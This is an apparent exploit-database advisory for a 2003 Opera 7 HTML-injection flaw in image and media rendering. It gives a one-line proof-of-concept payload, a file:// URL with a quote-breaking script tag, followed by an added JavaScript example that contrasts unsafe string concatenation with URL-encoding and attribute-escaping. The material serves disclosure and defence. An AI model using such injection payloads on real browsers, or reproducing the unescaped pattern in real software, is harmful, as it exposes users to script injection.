Opera 7 - Image Rendering HTML Injection



EKU-ID: 27706
Author: GreyMagic Software
Published: 2003-02-04
Verified: Verified

source: https://www.securityfocus.com/bid/6756/info

It has been reported that, when generating HTML to display images or embedded media, Opera does not correctly format the provided URL or sufficiently encode URLs to local files.

As a result of this lack of sanitization, Opera is vulnerable to HTML injection attacks when handling local image or media files.

open("file://localhost/images/file.gif?\"><script>alert(location.href);</script>","","");
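The encoding failure described above, shown beside a corrected form, as an added example that is not code from the advisory or from Opera. The wrapper-page template and all function names are assumptions made for illustration; the sample URL is the one from the proof of concept above.

```javascript
// Added example: a hypothetical generator for the wrapper page a browser
// builds around an image URL. Not Opera's code; the template is assumed.

// Vulnerable pattern: the URL goes into the attribute with no encoding,
// so a double quote in the URL ends the attribute and the rest is parsed as HTML.
function renderImagePageUnsafe(url) {
  return '<html><body><img src="' + url + '"></body></html>';
}

// Step 1: percent-encode characters that must not appear raw in a URL
// and that can break out of an attribute (quotes, angle brackets, whitespace).
function encodeUrlForMarkup(url) {
  return url.replace(/["'<>`\s]/g, function (ch) {
    return '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0');
  });
}

// Step 2: HTML-escape for a double-quoted attribute value, as defence in
// depth in case the URL encoder is bypassed or changed later.
function escapeAttribute(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Corrected pattern: URL-encode first, then attribute-escape.
function renderImagePageSafe(url) {
  return '<html><body><img src="' +
    escapeAttribute(encodeUrlForMarkup(url)) +
    '"></body></html>';
}

// Check helper: number of script start tags present in generated markup.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Sample input: the URL from the proof of concept on this page.
const sampleUrl =
  'file://localhost/images/file.gif?"><script>alert(location.href);</script>';

console.log(countScriptTags(renderImagePageUnsafe(sampleUrl)));
console.log(countScriptTags(renderImagePageSafe(sampleUrl)));
console.log(renderImagePageSafe(sampleUrl));
```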